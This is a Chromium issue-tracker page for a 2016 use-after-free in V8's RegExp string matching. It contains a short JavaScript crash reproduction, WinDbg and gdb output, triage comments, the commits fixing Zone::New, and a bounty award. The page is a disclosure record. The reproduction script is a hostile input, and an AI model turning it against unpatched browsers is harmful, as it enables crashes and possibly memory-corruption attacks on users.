Project: chromium Issues People Development process History Sign in
New issue
Advanced search Search tips
Note: Color blocks (like or ) mean that a user may not be available. Tooltip shows the reason.
Starred by 1 user
Status: Fixed
Owner:
Closed: Apr 2016
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: ----
Pri: 1
Type: Bug-Security



Sign in to add a comment
Security: Use After Free in RegExp of V8
Reported by cwhan.t...@gmail.com, Apr 23 2016 Back to list
VULNERABILITY DETAILS
"match" function with a very long string fails to properly allocate a memory, thus UAF occurs. 

VERSION
Windows Chrome 50.0.2661.87 32bit stable (V8 5.0.71.33)

REPRODUCTION CASE
--------------------------------
<script>
r2 = new RegExp("(?=)*", "g");
s0 = Array(220000700).join('a'); // the size could be different between v8 and chrome
result = s0.match(r2);
</script>
--------------------------------

FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION

runtime/runtime-strings.cc
 334 RUNTIME_FUNCTION(Runtime_StringMatch) {
..
 349   ZoneScope zone_scope(isolate->runtime_zone());
 350   ZoneList<int> offsets(8, zone_scope.zone());
 351
 352   while (true) {
 353     int32_t* match = global_cache.FetchNext();
 354     if (match == NULL) break;
 355     offsets.Add(match[0], zone_scope.zone());  // start <----------
 356     offsets.Add(match[1], zone_scope.zone());  // end
 357   }
..

"Add" method invocation tries to resize ZoneList when the length of offsets reaches the capacity, but there's no limitation check.

The reproduction code sometimes causes to copy to freed-memory in chrome.

0:000> u
0550020f f30f7f47f0      movdqu  xmmword ptr [edi-10h],xmm0
05500214 89fa            mov     edx,edi
05500216 83e20f          and     edx,0Fh
05500219 2bfa            sub     edi,edx
0550021b 2bf2            sub     esi,edx
0550021d 2bca            sub     ecx,edx
0550021f 89ca            mov     edx,ecx
05500221 c1ea06          shr     edx,6
0:000> dd edi
46018020  ???????? ???????? ???????? ????????
46018030  ???????? ???????? ???????? ????????

+ 447e0000 4c400000  7c20000             MEM_FREE    PAGE_NOACCESS

In d8 binary, string pointer is pointing one of elements of the offsets list.

v8::internal::Map::instance_type (this=0x240ec0c) at .././src/objects-inl.h:4268
4268      return static_cast<InstanceType>(READ_BYTE_FIELD(this, kInstanceTypeOffset));
(gdb) print this
$1 = (v8::internal::Map *) 0x240ec0c
(gdb) bt
#0  v8::internal::Map::instance_type (this=0x240ec0c) at .././src/objects-inl.h:4268
#1  0x08801ebf in v8::internal::HeapObject::IsString (this=0xf3708081) at .././src/objects-inl.h:164
#2  0x0886af5a in v8::internal::HeapObject::IsConsString (this=0xf3708081) at .././src/objects-inl.h:202
#3  0x0883347e in v8::internal::String::Flatten (string=..., pretenure=v8::internal::NOT_TENURED) at .././src/objects-inl.h:3421
#4  0x08c2831d in v8::internal::Factory::NewProperSubString (this=0xa1d2c38, str=..., begin=0, end=0) at ../src/factory.cc:597
#5  0x08e27ff0 in v8::internal::Factory::NewSubString (this=0xa1d2c38, str=..., begin=0, end=0) at .././src/factory.h:215
#6  0x093ed7b3 in v8::internal::__RT_impl_Runtime_StringMatch (args=..., isolate=0xa1d2c38) at ../src/runtime/runtime-strings.cc:372
#7  0x093ed256 in v8::internal::Runtime_StringMatch (args_length=3, args_object=0xffffd014, isolate=0xa1d2c38)
    at ../src/runtime/runtime-strings.cc:334
#8  0x2230b81c in ?? () 
 
Comment 1 by vakh@chromium.org, Apr 24 2016
Components: Blink>JavaScript
Owner: titzer@chromium.org
Status: Assigned
Thanks for the report! I've reproed this on the current stable Chrome.
+v8 folks. Could you please look into this, or find a more suitable owner?
Comment 2 by vakh@chromium.org, Apr 24 2016
Cc: jkummerow@chromium.org
Comment 3 by vakh@chromium.org, Apr 25 2016
Labels: Security_Severity-High
Marking Security_Severity-High based on the severity of other similar bugs.
Bug oweners, please feel free to change it if this isn't appropriate.
Comment 4 by vakh@chromium.org, Apr 25 2016
Labels: Security_Impact-Stable
Cc: yangguo@chromium.org
Interesting. This seems not really regexp-related, but more an issue with the ZoneList, and could happen elsewhere that also uses a ZoneList.

But if I'm reading this correctly, the ZoneList uses the ZoneAllocationPolicy, which, when invoking .New(), should trigger V8::FatalProcessOutOfMemory if expanding the zone fails. I'm a bit puzzled by this. Trying to reproduce.
Cc: hpayer@chromium.org
Cc: titzer@chromium.org
Labels: Pri-1
Owner: hpayer@chromium.org
Project Member Comment 9 by sheriffbot@chromium.org, Apr 25 2016
Labels: M-50
Owner: yangguo@chromium.org
This is not a GC issue. Assigning to Yang since he is already working on it.
Owner: hablich@chromium.org
I have not been able to reproduce this and unfortunately have no time to work on this. Michael, could you find a new owner for this?
Cc: hablich@chromium.org
Owner: verwa...@chromium.org
Toon, I think you were talking about this yesterday? Is this the same thing?
Labels: merge-review-5.1 merge-review-5.0
I've debugged this with Toon yesterday. Fix: https://codereview.chromium.org/1930873002 (should be merged back after Canary coverage).
Owner: jkummerow@chromium.org
Awesome, thanks.
Project Member Comment 15 by clusterf...@chromium.org, Apr 28 2016
Status: Fixed
Please mark security bugs as fixed as soon as the fix lands, and before requesting merges.

- Your friendly ClusterFuzz
Project Member Comment 16 by clusterf...@chromium.org, Apr 29 2016
Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify
Project Member Comment 17 by bugdroid1@chromium.org, Apr 29 2016
The following revision refers to this bug:
  https://chromium.googlesource.com/v8/v8.git/+/3a9bfecfe41737aaf0dbf92ce68352f8acaaaf73

commit 3a9bfecfe41737aaf0dbf92ce68352f8acaaaf73
Author: jkummerow <jkummerow@chromium.org>
Date: Fri Apr 29 11:53:59 2016

Fix overflow issue in Zone::New

When requesting a large allocation near the end of the address space,
the computation could overflow and erroneously *not* grow the Zone
as required.

BUG= chromium:606115 
LOG=y

Review-Url: https://codereview.chromium.org/1930873002
Cr-Commit-Position: refs/heads/master@{#35903}

[modify] https://crrev.com/3a9bfecfe41737aaf0dbf92ce68352f8acaaaf73/src/zone.cc

Labels: -merge-review-5.1 -merge-review-5.0 Merge-Request-51 Merge-Request-50
Comment 19 by tin...@google.com, May 3 2016
Labels: -Merge-Request-51 Merge-Approved-51 Hotlist-Merge-Approved
Your change meets the bar and is auto-approved for M51 (branch: 2704)
Comment 20 by tin...@google.com, May 3 2016
Labels: -Merge-Request-50 Merge-Review-50 Hotlist-Merge-Review
[Automated comment] Request affecting a post-stable build (M50), manual review required.
Comment 21 by tin...@google.com, May 3 2016
Labels: -Merge-Request-50 Merge-Review-50 Hotlist-Merge-Review
[Automated comment] Request affecting a post-stable build (M50), manual review required.
Project Member Comment 22 by bugdroid1@chromium.org, May 4 2016
Labels: merge-merged-5.1
The following revision refers to this bug:
  https://chromium.googlesource.com/v8/v8.git/+/36d0d2ed2a0d9088808b261f49d78f0a14b7d0ce

commit 36d0d2ed2a0d9088808b261f49d78f0a14b7d0ce
Author: Jakob Kummerow <jkummerow@chromium.org>
Date: Wed May 04 11:05:53 2016

Version 5.1.281.28 (cherry-pick)

Merged 3a9bfecfe41737aaf0dbf92ce68352f8acaaaf73

Fix overflow issue in Zone::New

BUG= chromium:606115 
LOG=N
R=cbruni@chromium.org

Review URL: https://codereview.chromium.org/1949973002 .

Cr-Commit-Position: refs/branch-heads/5.1@{#32}
Cr-Branched-From: 167dc63b4c9a1d0f0fe1b19af93644ac9a561e83-refs/heads/5.1.281@{#1}
Cr-Branched-From: 03953f52bd4a184983a551927c406be6489ef89b-refs/heads/master@{#35282}

[modify] https://crrev.com/36d0d2ed2a0d9088808b261f49d78f0a14b7d0ce/include/v8-version.h
[modify] https://crrev.com/36d0d2ed2a0d9088808b261f49d78f0a14b7d0ce/src/zone.cc

Cc: -titzer@chromium.org
Labels: -Merge-Review-50 Merge-Approved-50
Project Member Comment 25 by bugdroid1@chromium.org, May 4 2016
Labels: merge-merged-5.0
The following revision refers to this bug:
  https://chromium.googlesource.com/v8/v8.git/+/557b84becbfe9f6d10c281bb0b2dbb75403a497f

commit 557b84becbfe9f6d10c281bb0b2dbb75403a497f
Author: Jakob Kummerow <jkummerow@chromium.org>
Date: Wed May 04 14:17:19 2016

Version 5.0.71.47 (cherry-pick)

Merged 3a9bfecfe41737aaf0dbf92ce68352f8acaaaf73

Fix overflow issue in Zone::New

BUG= chromium:606115 
LOG=N
R=cbruni@chromium.org

Review URL: https://codereview.chromium.org/1945313002 .

Cr-Commit-Position: refs/branch-heads/5.0@{#56}
Cr-Branched-From: ad16e6c2cbd2c6b0f2e8ff944ac245561c682ac2-refs/heads/5.0.71@{#1}
Cr-Branched-From: bd9df50d75125ee2ad37b3d92c8f50f0a8b5f030-refs/heads/master@{#34215}

[modify] https://crrev.com/557b84becbfe9f6d10c281bb0b2dbb75403a497f/include/v8-version.h
[modify] https://crrev.com/557b84becbfe9f6d10c281bb0b2dbb75403a497f/src/zone.cc

Project Member Comment 26 by sheriffbot@chromium.org, May 7 2016
This issue has been approved for a merge. Please merge the fix to any appropriate branches as soon as possible!

If all merges have been completed, please remove any remaining Merge-Approved labels from this issue.

Thanks for your time! To disable nags, add the Disable-Nags label.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Labels: -Merge-Approved-50 -Hotlist-Merge-Approved -Hotlist-Merge-review -Merge-Approved-51
Labels: reward-topanel Release-3-M50
Comment 29 Deleted
Congratulations - $3000 for this report.

I'll add this to the next payment run - thanks again for the report! 
Labels: backport-review
Labels: reward-inprocess
Labels: -reward-unpaid
Project Member Comment 34 by sheriffbot@chromium.org, Aug 5 2016
Labels: -Restrict-View-SecurityNotify
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Labels: -backport-review backport-done
Labels: -Backport-Done NodeJS-Backport-Done
Project Member Comment 37 by sheriffbot@chromium.org, Oct 1 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Project Member Comment 38 by sheriffbot@chromium.org, Oct 2 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Labels: allpublic
Sign in to add a comment